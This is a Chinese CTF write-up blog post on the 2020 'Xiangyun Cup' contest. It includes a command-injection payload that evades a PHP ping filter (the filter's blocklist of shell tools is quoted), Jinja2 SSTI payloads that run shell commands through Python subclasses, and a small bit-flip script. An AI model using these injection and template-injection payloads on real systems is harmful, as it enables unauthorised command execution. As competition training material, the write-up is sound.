2020 “祥云杯”网络安全大赛

上午做了两个Web就歇了,其他都是学弟做的 战队排名:172

首届“祥云杯”网络安全大赛

签到

base64直接解

Command

这题拿了个二血 也没什么额外的加分 没多久分值就白菜了
fuzz了一下 发现过滤不多
用%09绕过空格过滤 ca\t绕过cat的过滤
搜索了一下flag的位置

Result:/sys/devices/platform/serial8250/tty/ttyS0/flags
/sys/devices/platform/serial8250/tty/ttyS1/flags
/sys/devices/pci0000:00/0000:00:03.0/virtio0/net/eth0/flags
/sys/devices/virtual/net/dummy0/flags
/sys/devices/virtual/net/lo/flags
/sys/module/scsi_mod/parameters/default_dev_flags
/usr/share/perl/5.18.2/IO/Uncompress/AnyInflate.pm
/usr/share/perl/5.18.2/IO/Uncompress/Inflate.pm
/usr/share/perl/5.18.2/IO/Uncompress/Adapter/Inflate.pm
/usr/share/perl/5.18.2/IO/Uncompress/RawInflate.pm
/usr/share/perl/5.18.2/IO/Compress/RawDeflate.pm
/usr/share/perl/5.18.2/IO/Compress/Adapter/Deflate.pm
/usr/share/perl/5.18.2/IO/Compress/Deflate.pm
/usr/lib/perl/5.18.2/bits/waitflags.ph
/usr/lib/apache2/modules/mod_deflate.so
/etc/.findflag
/etc/.findflag/flag.txt
/etc/apache2/mods-available/deflate.conf
/etc/apache2/mods-available/deflate.load
/etc/apache2/mods-enabled/deflate.conf
/etc/apache2/mods-enabled/deflate.load
/proc/sys/kernel/sched_domain/cpu0/domain0/flags
/proc/sys/kernel/sched_domain/cpu1/domain0/flags
/proc/kpageflags
/var/lib/apache2/module/enabled_by_maint/deflate

flag文件位置:/etc/.findflag/flag.txt
payload:http://eci-2zechif0ewh04tj7nhh9.cloudeci1.ichunqiu.com/index.php?url=%7Cca%5Ct%09%2Fetc%2F.find%3F%3F%3F%3F%2F%3F%3F%3F%3F.%3F%3F%3F
最后才读取了一下题目源码 看了一下过滤的列表

<?php
error_reporting(0);
if (isset($_GET['url'])) {
  $ip=$_GET['url'];
  if(preg_match("/(;|'| |>|]|&| |\\$|python|sh|nc|tac|rev|more|tailf|index|php|head|nl|tail|less|cat|ruby|perl|bash|rm|cp|mv|\*|\{)/i", $ip)){
      die("<script language='javascript' type='text/javascript'>
      alert('no no no!')
      window.location.href='index.php';</script>");
  }else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){
      die("<script language='javascript' type='text/javascript'>
      alert('no flag!')
      window.location.href='index.php';</script>");
  }
  $a = shell_exec("ping -c 4 ".$ip);
}
?>

flaskbot

根据debug信息 爆出部分源码

/usr/local/lib/python2.7/site-packages/flask/app.py

...
#以下是46行
    user=request.cookies.get('user')
     if user == None
        return render_template("index.html")
    else:
        user=user.encode('utf-8')
        return render_template("guess.html",name=base64.urlsafe_b64decode(user))
 
@app.route('/guess',methods=['POST'])
def Guess():
    user=request.cookies.get('user')
    if user==None:
        return redirect(url_for("Hello"))
    user=user.encode('utf-8')
    name = base64.urlsafe_b64decode(user)
    num = float(request.form['num'])
    if(num<0):
        return "Too Small"
    elif num>1000000000.0:
        return "Too Large"
    else:
        return render_template_string(guessNum(num,name))
 
@app.errorhandler(404)
def miss(e):
    return "What are you looking for?!!".getattr(app, '__name__', getattr(app.__class__, '__name__')), 404
 
if __name__ == '__main__':
    f_handler=open('/var/log/app.log', 'w')
    sys.stderr=f_handler
    app.run(debug=True, host='0.0.0.0',port=8888)

<div id="wrapper">
    <section id="main"><header
                    <span class="avatar"><img src="static/images/avatar.jpg" alt="" /></span>
                    <h1>Guessing Robot</h1>
                    <p>Hi { {name} }.I'm good at guessing numbers!</p>
            </header>

            <hr />
            <h2>Input your Lucky Num(0.0-1000000000.0)</h2>

后来发现当传入数字为NaN时 可以直接执行name中的代码
构建payload

{ {''.__class__.__mro__[2].__subclasses__()[258]('ls', shell=True, stdout=-1).communicate()[0].strip()} }

经过Fuzz发现过滤了* ? flag 所以构建了一下payload

{ {''.__class__.__mro__[2].__subclasses__()[258]('cat /super_secret_fl\\ag.txt', shell=True, stdout=-1).communicate()[0].strip()} }

进制反转

帮学弟写了个反转的辣鸡脚本

from os import write

file = open("./flag")
output = open("./output","w+c")
for line in file:
    for i in line:
        if i == '0':
            i = '1'
        elif i == '1':
            i = '0'
        output.write(i)

最后吐槽

感觉现在的 CTF 比赛 py 成风,出题重复度也高,很多题在网上都能搜得到高度相似的,打 CTF 也没有以前那种探索的热情了,大概就是做几道不浪费时间的,其他感兴趣的等一波 wp 就算是完成一次比赛了。


© 2021. All rights reserved.

本站总访问量 Web Analytics

Powered by Hydejack v9.1.2 & Moded by ZYA